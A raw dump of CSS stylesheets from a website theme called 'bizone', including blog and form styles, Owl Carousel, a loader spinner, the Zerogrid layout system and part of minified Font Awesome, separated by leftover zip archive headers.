	 font-size:12px;
    padding: 8px 15px;
	 text-transform:uppercase;
}
#area-main .tag-cloud li a:hover , #area-main .tag-cloud li a:focus ,
.blog-reply a.btn-rep:hover,.blog-reply a.btn-rep:focus{
    background:#82b440;
    color: #fff;
	 -webkit-transition: all 500ms linear;
   -moz-transition: all 500ms linear;
	-ms-transition: all 500ms linear;
   -o-transition:all 500ms linear;
	transition:all 500ms linear;
}

.blog-item ul.social-link li{ margin:0; }
.blog-item ul.social-link li a > i{
	color: #1b1d1f;
}
.blog-item ul.social-link li a > i:hover{
	color: #fff;
}
.blog-reply{
	padding:10px;
	border:1px solid #f3f3f3;
	position:relative;
	margin:20px 0;
}
.blog-reply h4{
	color:#1b1d1f;
	margin-bottom:8px;
	text-transform:capitalize;
}
.blog-reply a.btn-rep{
	position:absolute;
	top:0;
	right:0;
}

.blog-item .post-comment h3{
	margin-bottom:35px;
	margin-top:70px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control{
	height:50px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control,
.blog-item .post-comment form textarea,
.contact form textarea,
.index_3 .form-inline .form-control,
.index_3 .form-inline textarea{
  padding:15px;
  font-size:14px;
  color:#4c4c4c;
  border:1px solid #d0d0d0;
  width:100%;
  border-radius:0;
}

.blog-item .post-comment form textarea, 
.contact form textarea{
	margin:30px 0;
	min-height:210px;
}

.blog-item .post-comment form input[type="submit"] , 
.contact form input[type="submit"]{
	background:#82b440;
	border:1px solid transparent;
	font-weight:bold;
	color:#fff;
	height:50px;
	width:185px;
	position:relative;
}
.blog-item .post-comment form input[type="submit"]:hover , 
.contact form input[type="submit"]:hover{
	background:#1b1d1f;
}
 
.widget{
	margin-bottom:40px;
	color:#1b1d1f;
}

.widget h4 , .widget img{
	margin-bottom:25px;
}
.widget > img{
	width:100%;
}

.search_box input {
  border: 1px solid #d9d9d9;
  height: 53px;
  padding-left: 15px;
  position: relative;
  width: 100%;
  font-size:14px;
}

.search_box i {
  border-left: 1px solid #d9d9d9;
  bottom: 0;
  color: #d9d9d9;
  font-size: 24px;
  height: 53px;
  padding: 15px;
  position: absolute;
  right: 15px;
  top: 0;
  cursor:pointer;
}

ul.category li{
	margin-top:15px;
	display:block;
}

ul.category li a{
	color:#1b1d1f;
	font-size:16px;
	border-bottom:1px solid #d9d9d9;
	padding-bottom:15px;
	display:block;
	text-transform:capitalize !important;
}
ul.category li a:hover , ul.category li a:focus{
	color:#82b440;
}

ul.category li a .date{
	color:#82b440;
	font-size:12px;
	display:block;
}

/*=========================================*/
          /* Blog Ends */
/*=========================================*/




          /* Inner Pages Top*/
.innerpage-banner {
	background: no-repeat center center / cover;
	padding-top: 200px;
	max-height:440px;
	border-bottom: 5px solid rgba(0,0,0,0.9);
	color: #075da6;
	
}
.tagline {
	color: #fff;
	text-transform: uppercase;
	font-size: 14px;
}




@media screen and (max-width: 1299px){
    .navbar-default .navbar-nav > li{
		  margin: 0 20px;
	  }
	.info-section .bg{
		padding-top:100%;
	}
	.blog-wrap .blog-content {
	  padding: 3.5em 0;
	}
	
	 .layer-content-responsive {
		max-height:400px !important;
		overflow:hidden;
	}
}


@media screen and (max-width: 1024px){
	
	h2{ font-size:36px; }
	h3{ font-size:20px; }
	h4{ font-size:16px; }
	
}

@media screen and (max-width: 1000px){
	 
.navbar-default .navbar-nav > li {
	margin: 0 6px;
}
.navbar-default .navbar-nav > li > a {
  letter-spacing: 0;
}
.text-rotator {
  padding-top:150px;
}
#paralax-slider .item-content p{
  font-size:16px;
}
#paralax-slider .item-content h2 {
  font-size:46px;
  margin-bottom:10px;
}
.r-test ul.r-feature li {
font-size: 12px;
}
.we-do .do-wrap, .white-box {
margin-bottom:30px;
}
.pricing_item {
flex: 0 1 320px;
}
#bg-paralax , #testinomial, .text-rotator{
  background-position:center center !important;
}	
#slogan{
text-align:center;
}
#slogan p{s
font-size:16px;
}	
#slogan a.pull-right {
float: none !important;
margin-top: 30px;

}


		
}



@media screen and (max-width: 767px){

  h2{ font-size:30px; }
  #main-navigation{ background-color: #1b1d1f; }
  
  .navbar-brand, #navigation.affix .navbar-brand{ display:inline-block;  padding: 10px 0;}
  .navbar-default .navbar-nav > li > a, #navigation.affix  .navbar-default .navbar-nav > li > a {
	  padding: 10px 0;
	}
   ul.top-right, #navigation.affix ul.top-right{
		margin:0;
		position:relative;
		right:37px;
		margin-top:-2px;
	}
	ul.top-right, #navigation.affix ul.top-right{
		top:14px;
	}
	.navbar-default.social .navbar-toggle {
     right: -100px !important;
  }
  .main-button { top: 10px;}
	  .push_nav_brand {
	  margin: 12px 0 30px 15px;
	  width:90;
  }
  .push_nav li a {
  font-size:12px;
  padding: 8px 15px;
}
.text-rotator {
  padding-top:80px;
}
#paralax-slider .item-content p{
  font-size:14px;
}
#paralax-slider .item-content h2 {
  font-size: 26px;
  margin-bottom:10px;
}
	#bg-paralax h1, #bg-paralax h2{
		font-size:30px;
	}
	.we-do .do-wrap,
	.thinkers .thinker-wrap{
		margin:30px 0;
	}
	#thinkers{
		padding-bottom:45px;
	}	
	.thinker-image .overlay {
	  height: 60px;
	}
	#project{ padding-top:0;}
	#responsive{
	}
	#responsive .responsive-pic > .col-md-6 > img{
	  margin-bottom: 25px;
	}
	.number-counters > .col-xs-12{
		width:50%;
	}	
	.circliful {
	  margin-bottom: 50px;
	}
	.circliful:first-child {
	  margin-left:25px;
	}
	#testinomial-slider .item p{
		font-size:14px;
		margin:0;
	}
	#testinomial-slider .owl-prev, #testinomial-slider .owl-next{
		display:none;
	}
	#publication-slider .owl-prev{
		left:10px;
	}
	#publication-slider .owl-next{
		right:10px;
	}
	#publication-slider .owl-prev, #publication-slider .owl-next{
		background:#fff;
		top:19%;
		
	}
	
	
	.circliful {
	  margin-bottom: 50px;
	  margin-left:0;
	  float:none;
	  display:inline-block
	  
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	
	
		
}


@media screen and (min-width: 641px) and (max-width: 767px) { 

      .thinkers .col-sm-4{
		  width: 48%;
		  display:inline-block;
	  } 
	  
	 
	  
	  
	  
	  
	  
   
}




@media screen and (max-width: 480px) {
	.navbar-brand img{
		width:75%;
	}
	ul.top-right{
		top:14px;
	}
	.circliful {
	  margin-bottom: 50px;
	  position:relative;
	  left:30%;
	  margin-left:0;
	  float:none;
	  -moz-transform:translate(-50%,0);
	 -ms-transform:translate(-50%,0);
	 -webkit-transform:translate(-50%,0);
	 -o-transform:translate(-50%,0);
	  transform:translate(-50%,0);
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	.layer-content-responsive {
		max-height:240px !important;
		overflow:hidden;
	}
}



@media screen and (max-width: 479px){
	
	#main-navigation{
		top:0;
	}
	
}

.morepost-wrap ul.pagination-list {
    margin: 0;
    padding: 0;
    width: 100%;
}
.morepost-wrap ul.pagination-list li {
    display: none;
}
.morepost-wrap ul.pagination-list li.morepost {
    display: block;
}
.morepost-wrap .pagination > li > a {
    border: medium none;
}
.morepost-wrap .pagination > li > a:focus, .morepost-wrap .pagination > li > a:hover {
    background-color: transparent;
    color: #07aaa5;
}
#itemListLeading > .itemContainer:last-child .blog-item-v3{
	padding: 0;
	border: none;
}
.pagination-list .morepost-wrap{
	border-bottom: 1px solid #d1d2d2;
	border-top: 0;
	margin-top: -70px;
	padding-bottom: 20px;
}
body.com_k2 #area-main.padding{
	padding-bottom: 70px;
}
.blog-item div.itemComments {
    background: rgba(0, 0, 0, 0) none repeat scroll 0 0;
    border: medium none;
    border-radius: 0;
    padding: 0;
}
body.com_k2 div.itemBackToTop{
	display: none;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton{
 	background: #82b440 none repeat scroll 0 0;
    border: 1px solid transparent;
    color: #fff;
    font-weight: bold;
    height: 50px;
    position: relative;
    width: 185px;
    border-radius: 0;
    padding: 0;
    margin: 0;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton:hover{
	background: #000;
}
body.com_k2 div.itemCommentsForm form span#formLog{
	margin-left: 0;
	margin-right: 0;
}
.blog-reply.media{
	margin-top: 20px;
}
#about.section-padding.btwe-offer{
	padding-top: 130px!important;
}PK!<�֌��bizone/css/owl.carousel.cssnu&1i�/* 
 * 	Core Owl Carousel CSS File
 *	v1.3.3
 */

/* clearfix */
.owl-carousel .owl-wrapper:after {
	content: ".";
	display: block;
	clear: both;
	visibility: hidden;
	line-height: 0;
	height: 0;
}
/* display none until init */
.owl-carousel{
	display: none;
	position: relative;
	width: 100%;
	-ms-touch-action: pan-y;
}
.owl-carousel .owl-wrapper{
	display: none;
	position: relative;
	-webkit-transform: translate3d(0px, 0px, 0px);
}
.owl-carousel .owl-wrapper-outer{
	overflow: hidden;
	position: relative;
	width: 100%;
}
.owl-carousel .owl-wrapper-outer.autoHeight{
	-webkit-transition: height 500ms ease-in-out;
	-moz-transition: height 500ms ease-in-out;
	-ms-transition: height 500ms ease-in-out;
	-o-transition: height 500ms ease-in-out;
	transition: height 500ms ease-in-out;
}
	
.owl-carousel .owl-item{
	float: left;
}
.owl-controls .owl-page,
.owl-controls .owl-buttons div{
	cursor: pointer;
}
.owl-controls {
	-webkit-user-select: none;
	-khtml-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
	-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

/* mouse grab icon */
.grabbing { 
    cursor:url(grabbing.png) 8 8, move;
}

/* fix */
.owl-carousel  .owl-wrapper,
.owl-carousel  .owl-item{
	-webkit-backface-visibility: hidden;
	-moz-backface-visibility:    hidden;
	-ms-backface-visibility:     hidden;
  -webkit-transform: translate3d(0,0,0);
  -moz-transform: translate3d(0,0,0);
  -ms-transform: translate3d(0,0,0);
}



.owl-theme .owl-controls{
	margin-top: 10px;
	text-align: center;
}

/* Styling Next and Prev buttons */

.owl-theme .owl-controls .owl-buttons div{
	color: #FFF;
	display: inline-block;
	zoom: 1;
	*display: inline;/*IE7 life-saver */
	margin: 5px;
	padding: 3px 10px;
	font-size: 12px;
	/*-webkit-border-radius: 30px;
	-moz-border-radius: 30px;
	border-radius: 30px;*/
	background: #869791;
	filter: Alpha(Opacity=50);/*IE7 fix*/
	opacity: 0.5;
}
/* Clickable class fix problem with hover on touch devices */
/* Use it for non-touch hover action */
.owl-theme .owl-controls.clickable .owl-buttons div:hover{
	filter: Alpha(Opacity=100);/*IE7 fix*/
	opacity: 1;
	text-decoration: none;
}

/* Styling Pagination*/

.owl-theme .owl-controls .owl-page{
	display: inline-block;
	zoom: 1;
	*display: inline;/*IE7 life-saver */
}
.owl-theme .owl-controls .owl-page span{
	display: block;
	width: 12px;
	height: 12px;
	margin: 5px 7px;
	filter: Alpha(Opacity=50);/*IE7 fix*/
	opacity: 0.5;
	-webkit-border-radius: 20px;
	-moz-border-radius: 20px;
	border-radius: 20px;
	background: #869791;
}

.owl-theme .owl-controls .owl-page.active span,
.owl-theme .owl-controls.clickable .owl-page:hover span{
	filter: Alpha(Opacity=100);/*IE7 fix*/
	opacity: 1;
}

/* If PaginationNumbers is true */

.owl-theme .owl-controls .owl-page span.owl-numbers{
	height: auto;
	width: auto;
	color: #FFF;
	padding: 2px 10px;
	font-size: 12px;
	-webkit-border-radius: 30px;
	-moz-border-radius: 30px;
	border-radius: 30px;
}

/* preloading images */
.owl-item.loading{
	min-height: 150px;
	background: url(AjaxLoader.gif) no-repeat center center
}

PK!�>�MMbizone/css/loader.cssnu&1i�

.loader{
	position: fixed;
	background:#fff;
	z-index:11000;
	height:100%;
	width:100%;
	overflow:hidden;
}

.spinner {
  margin: auto;
  width: 40px;
  height: 40px;
  position: relative;
  text-align: center;
  position:absolute;
  left:50%;
  right:50%;
  margin-left:-20px;
  top:50%;
  
  -webkit-animation: sk-rotate 2.0s infinite linear;
  animation: sk-rotate 2.0s infinite linear;
}

.dot1, .dot2 {
  width: 60%;
  height: 60%;
  display: inline-block;
  position: absolute;
  top: 0;
  background-color: #82B440;
  border-radius: 100%;
  
  -webkit-animation: sk-bounce 2.0s infinite ease-in-out;
  animation: sk-bounce 2.0s infinite ease-in-out;
}
.dot1{
	background-color: #82B440;
}	
.dot2 {
  top: auto;
  background-color: #07AAA5;
  bottom: 0;
  -webkit-animation-delay: -1.0s;
  animation-delay: -1.0s;
}

@-webkit-keyframes sk-rotate { 100% { -webkit-transform: rotate(360deg) }}
@keyframes sk-rotate { 100% { transform: rotate(360deg); -webkit-transform: rotate(360deg) }}

@-webkit-keyframes sk-bounce {
  0%, 100% { -webkit-transform: scale(0.0) }
  50% { -webkit-transform: scale(1.0) }
}

@keyframes sk-bounce {
  0%, 100% { 
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 50% { 
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}PK!����bizone/css/zerogrid.cssnu&1i�/*
Zerotheme.com | Free Html5 Responsive Templates
Zerogrid - A Single Grid System for Responsive Design
Author: Kimmy
Version : 3.0
Author URI: http://www.zerotheme.com/
*/
/* -------------------------------------------- */



/* ---------------------------------------------------------------------------- */
/* -------------------------------Item-Effect---------------------------------- */
/* ---------------------------------------------------------------------------- */	
.item-container {
	position: relative;
	overflow: hidden;
	display: inline-block;
	text-align: center;
	vertical-align: top;
	box-sizing: border-box;
	-moz-box-sizing: border-box;
	-webkit-box-sizing: border-box;
	width:100%;
}
.item-container img {
	display: block;
	width: 100%;
	height: auto;
	-webkit-transition: all .5s ease; /* Safari and Chrome */
    -moz-transition: all .5s ease; /* Firefox */
    -ms-transition: all .5s ease; /* IE 9 */
    -o-transition: all .5s ease; /* Opera */
    transition: all .5s ease;
	 overflow:hidden;
}
.item-container .item-caption {
	position: absolute;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	z-index: 10;
	background: none;
	width: 100%;
	height: 100%;
	-webkit-transition: all .5s ease; /* Safari and Chrome */
    -moz-transition: all .5s ease; /* Firefox */
    -ms-transition: all .5s ease; /* IE 9 */
    -o-transition: all .5s ease; /* Opera */
    transition: all .5s ease;
}
.item-caption-inner {
	display: table;
	width: 100%;
	height: 100%;
}
.item-caption-inner1 {
	display: table-cell;
	width: 100%;
	height: 100%;
	vertical-align: middle;
}
.item-container .item-caption h3, .item-container .item-caption span{
	display: block;
	text-align: center;
	text-transform: uppercase;
	color: #444;
	display: none;
}
.item-container .item-caption h3{
	font-size: 23px;
	letter-spacing: 2px;
	margin-bottom : 12px;
}
.item-container .item-caption span{
	font-style: italic;
	font-size: 12px;
}

.item-container:hover .item-caption {
	background: rgba(255, 255, 255, 0.75);
}
.item-container:hover .item-caption h3, .item-container:hover .item-caption span{
	display: block;
}




/* ------------------Grid System--------------- */ 
.zerogrid{ width:100%; position: relative;}
.zerogrid:after { content: "\0020"; display: block; height: 0; clear: both; visibility: hidden; }

.zerogrid .f-right{float: right!important;}
.zerogrid .f-left{float: left!important;}

.zerogrid .row{}
.zerogrid .row:before,.row:after { content: '\0020'; display: block; overflow: hidden; visibility: hidden; width: 0; height: 0; }
.zerogrid .row:after{clear: both; }
.zerogrid .row{zoom: 1;}

/*.zerogrid .wrap-col{margin:10px;}*/

.zerogrid .col-1-2, .zerogrid .col-1-3, .zerogrid .col-2-3, .zerogrid .col-1-4, .zerogrid .col-2-4, .zerogrid .col-3-4, .zerogrid .col-1-5, .zerogrid .col-2-5, .zerogrid .col-3-5, .zerogrid .col-4-5, .zerogrid .col-1-6, .zerogrid .col-2-6, .zerogrid .col-3-6, .zerogrid .col-4-6, .zerogrid .col-5-6{float:left; /*display: inline-block;*/}

.zerogrid .col-full{width:100%;}

.zerogrid .col-1-2,.zerogrid .col-1-2-fixed{width:50%;}
.zerogrid .offset-1-2{margin-left: 50%;}

.zerogrid .col-1-3,.zerogrid .col-1-3-fixed{width:33.33%;}
.zerogrid .col-2-3,.zerogrid .col-2-3-fixed{width:66.66%;}
.zerogrid .offset-1-3{margin-left: 33.33%;}
.zerogrid .offset-2-3{margin-left: 66.66%;}

.zerogrid .col-1-4,.zerogrid .col-1-4-fixed{width:25%;}
.zerogrid .col-2-4,.zerogrid .col-2-4-fixed{width:50%;}
.zerogrid .col-3-4,.zerogrid .col-3-4-fixed{width:75%;}
.zerogrid .offset-1-4{margin-left: 25%;}
.zerogrid .offset-2-4{margin-left: 50%;}
.zerogrid .offset-3-4{margin-left: 75%;}

.zerogrid .col-1-5,.zerogrid .col-1-5-fixed{width:20%;}
.zerogrid .col-2-5,.zerogrid .col-2-5-fixed{width:40%;}
.zerogrid .col-3-5,.zerogrid .col-3-5-fixed{width:60%;}
.zerogrid .col-4-5,.zerogrid .col-4-5-fixed{width:80%;}
.zerogrid .offset-1-5{margin-left: 20%;}
.zerogrid .offset-2-5{margin-left: 40%;}
.zerogrid .offset-3-5{margin-left: 60%;}
.zerogrid .offset-4-5{margin-left: 80%;}

.zerogrid .col-1-6,.zerogrid .col-1-6-fixed{width:16.66%;}
.zerogrid .col-2-6,.zerogrid .col-2-6-fixed{width:33.33%;}
.zerogrid .col-3-6,.zerogrid .col-3-6-fixed{width:50%;}
.zerogrid .col-4-6,.zerogrid .col-4-6-fixed{width:66.66%;}
.zerogrid .col-5-6,.zerogrid .col-5-6-fixed{width:83.33%;}
.zerogrid .offset-1-6{margin-left: 16.66%;}
.zerogrid .offset-2-6{margin-left: 33.33%;}
.zerogrid .offset-3-6{margin-left: 50%;}
.zerogrid .offset-4-6{margin-left: 66.66%;}
.zerogrid .offset-5-6{margin-left: 83.33%;}

@media only screen and (min-width: 960px) and (max-width: 1199px) {
	.zerogrid{/*width:960px;*/}
}

@media only screen and (min-width: 768px) and (max-width: 959px) {
	/*.zerogrid{width:768px;}*/
}

@media only screen and (max-width: 767px) {
	.zerogrid, .zerogrid .col-1-2, .zerogrid .col-1-3, .zerogrid .col-2-3, .zerogrid .col-1-4, .zerogrid .col-2-4, .zerogrid .col-3-4, .zerogrid .col-1-5, .zerogrid .col-2-5, .zerogrid .col-3-5, .zerogrid .col-4-5, .zerogrid .col-1-6, .zerogrid .col-2-6, .zerogrid .col-3-6, .zerogrid .col-4-6, .zerogrid .col-5-6{width:100%;}
	
	.zerogrid .offset-1-2, .zerogrid .offset-1-3, .zerogrid .offset-2-3, .zerogrid .offset-1-4, .zerogrid .offset-2-4, .zerogrid .offset-3-4, .zerogrid .offset-1-5, .zerogrid .offset-2-5, .zerogrid .offset-3-5, .zerogrid .offset-4-5, .zerogrid .offset-1-6, .zerogrid .offset-2-6, .zerogrid .offset-3-6, .zerogrid .offset-4-6, .zerogrid .offset-5-6{margin-left:0;}
}
PK!k��GNkNkbizone/css/font-awesome.min.cssnu&1i�/*!
 *  Font Awesome 4.5.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.5.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.5.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.5.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.5.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.5.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.5.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}.fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=1);-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2);-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=3);-webkit-transform:rotate(270deg);-ms-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);-webkit-transform:scale(-1, 1);-ms-transform:scale(-1, 1);transform:scale(-1, 1)}.fa-flip-vertical{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);-webkit-transform:scale(1, -1);-ms-transform:scale(1, -1);transform:scale(1, -1)}:root .fa-rotate-90,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-flip-horizontal,:root .fa-flip-vertical{filter:none}.fa-stack{position:relative;display:inline-block;width:2em;height:2em;line-height:2em;vertical-align:middle}.fa-stack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart:before{content:"\f004"}.fa-star:before{content:"\f005"}.fa-star-o:before{content:"\f006"}.fa-user:before{content:"\f007"}.fa-film:before{content:"\f008"}.fa-th-large:before{content:"\f009"}.fa-th:before{content:"\f00a"}.fa-th-list:before{content:"\f00b"}.fa-check:before{content:"\f00c"}.fa-remove:before,.fa-close:before,.fa-times:before{content:"\f00d"}.fa-search-plus:before{content:"\f00e"}.fa-search-minus:before{content:"\f010"}.fa-power-off:before{content:"\f011"}.fa-signal:before{content:"\f012"}.fa-gear:before,.fa-cog:before{content:"\f013"}.fa-trash-o:before{content:"\f014"}.fa-home:before{content:"\f015"}.fa-file-o:before{content:"\f016"}.fa-clock-o:before{content:"\f017"}.fa-road:before{content:"\f018"}.fa-download:before{content:"\f019"}.fa-arrow-circle-o-down:before{content:"\f01a"}.fa-arrow-circle-o-up:before{content:"\f01b"}.fa-inbox:before{content:"\f01c"}.fa-play-circle-o:before{content:"\f01d"}.fa-rotate-right:before,.fa-repeat:before{content:"\f01e"}.fa-refresh:before{content:"\f021"}.fa-list-alt:before{content:"\f022"}.fa-lock:before{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.fa-tags:before{content:"\f02c"}.fa-book:before{content:"\f02d"}.fa-bookmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-camera:before{content:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-width:before{content:"\f035"}.fa-align-left:before{content:"\f036"}.fa-align-center:before{content:"\f037"}.fa-align-right:before{content:"\f038"}.fa-align-justify:before{content:"\f039"}.fa-list:before{content:"\f03a"}.fa-dedent:before,.fa-outdent:before{content:"\f03b"}.fa-indent:before{content:"\f03c"}.fa-video-camera:before{content:"\f03d"}.fa-photo:before,.fa-image:before,.fa-picture-o:before{content:"\f03e"}.fa-pencil:before{content:"\f040"}.fa-map-marker:before{content:"\f041"}.fa-adjust:before{content:"\f042"}.fa-tint:before{content:"\f043"}.fa-edit:before,.fa-pencil-square-o:before{content:"\f044"}.fa-share-square-o:before{content:"\f045"}.fa-check-square-o:before{content:"\f046"}.fa-arrows:before{content:"\f047"}.fa-step-backward:before{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:before{content:"\f055"}.fa-minus-circle:before{content:"\f056"}.fa-times-circle:before{content:"\f057"}.fa-check-circle:before{content:"\f058"}.fa-question-circle:before{content:"\f059"}.fa-info-circle:before{content:"\f05a"}.fa-crosshairs:before{content:"\f05b"}.fa-times-circle-o:before{content:"\f05c"}.fa-check-circle-o:before{content:"\f05d"}.fa-ban:before{content:"\f05e"}.fa-arrow-left:before{content:"\f060"}.fa-arrow-right:before{content:"\f061"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-down:before{content:"\f063"}.fa-mail-forward:before,.fa-share:before{content:"\f064"}.fa-expand:before{content:"\f065"}.fa-compress:before{content:"\f066"}.fa-plus:before{content:"\f067"}.fa-minus:before{content:"\f068"}.fa-asterisk:before{content:"\f069"}.fa-exclamation-circle:before{content:"\f06a"}.fa-gift:before{content:"\f06b"}.fa-leaf:before{content:"\f06c"}.fa-fire:before{content:"\f06d"}.fa-eye:before{content:"\f06e"}.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:before{content:"\f07b"}.fa-folder-open:before{content:"\f07c"}.fa-arrows-v:before{content:"\f07d"}.fa-arrows-h:before{content:"\f07e"}.fa-bar-chart-o:before,.fa-bar-chart:before{content:"\f080"}.fa-twitter-square:before{content:"\f081"}.fa-facebook-square:before{content:"\f082"}.fa-camera-retro:before{content:"\f083"}.fa-key:before{content:"\f084"}.fa-gears:before,.fa-cogs:before{content:"\f085"}.fa-comments:before{content:"\f086"}.fa-thumbs-o-up:before{content:"\f087"}.fa-thumbs-o-down:before{content:"\f088"}.fa-star-half:before{content:"\f089"}.fa-heart-o:before{content:"\f08a"}.fa-sign-out:before{content:"\f08b"}.fa-linkedin-square:before{content:"\f08c"}.fa-thumb-tack:before{content:"\f08d"}.fa-external-link:before{content:"\f08e"}.fa-sign-in:before{content:"\f090"}.fa-trophy:before{content:"\f091"}.fa-github-square:before{content:"\f092"}.fa-upload:before{content:"\f093"}.fa-lemon-o:before{content:"\f094"}.fa-phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-feed:before,.fa-rss:before{content:"\f09e"}.fa-hdd-o:before{content:"\f0a0"}.fa-bullhorn:before{content:"\f0a1"}.fa-bell:before{content:"\f0f3"}.fa-certificate:before{content:"\f0a3"}.fa-hand-o-right:before{content:"\f0a4"}.fa-hand-o-left:before{content:"\f0a5"}.fa-hand-o-up:before{content:"\f0a6"}.fa-hand-o-down:before{content:"\f0a7"}.fa-arrow-circle-left:before{content:"\f0a8"}.fa-arrow-circle-right:before{content:"\f0a9"}.fa-arrow-circle-up:before{content:"\f0aa"}.fa-arrow-circle-down:before{content:"\f0ab"}.fa-globe:before{content:"\f0ac"}.fa-wrench:before{content:"\f0ad"}.fa-tasks:before{content:"\f0ae"}.fa-filter:before{content:"\f0b0"}.fa-briefcase:before{content:"\f0b1"}.fa-arrows-alt:before{content:"\f0b2"}.fa-group:before,.fa-users:before{content:"\f0c0"}.fa-chain:before,.fa-link:before{content:"\f0c1"}.fa-cloud:before{content:"\f0c2"}.fa-flask:before{content:"\f0c3"}.fa-cut:before,.fa-scissors:before{content:"\f0c4"}.fa-copy:before,.fa-files-o:before{content:"\f0c5"}.fa-paperclip:before{content:"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:"\f0cd"}.fa-table:before{content:"\f0ce"}.fa-magic:before{content:"\f0d0"}.fa-truck:before{content:"\f0d1"}.fa-pinterest:before{content:"\f0d2"}.fa-pinterest-square:before{content:"\f0d3"}.fa-google-plus-square:before{content:"\f0d4"}.fa-google-plus:before{content:"\f0d5"}.fa-money:before{content:"\f0d6"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-up:before{content:"\f0d8"}.fa-caret-left:before{content:"\f0d9"}.fa-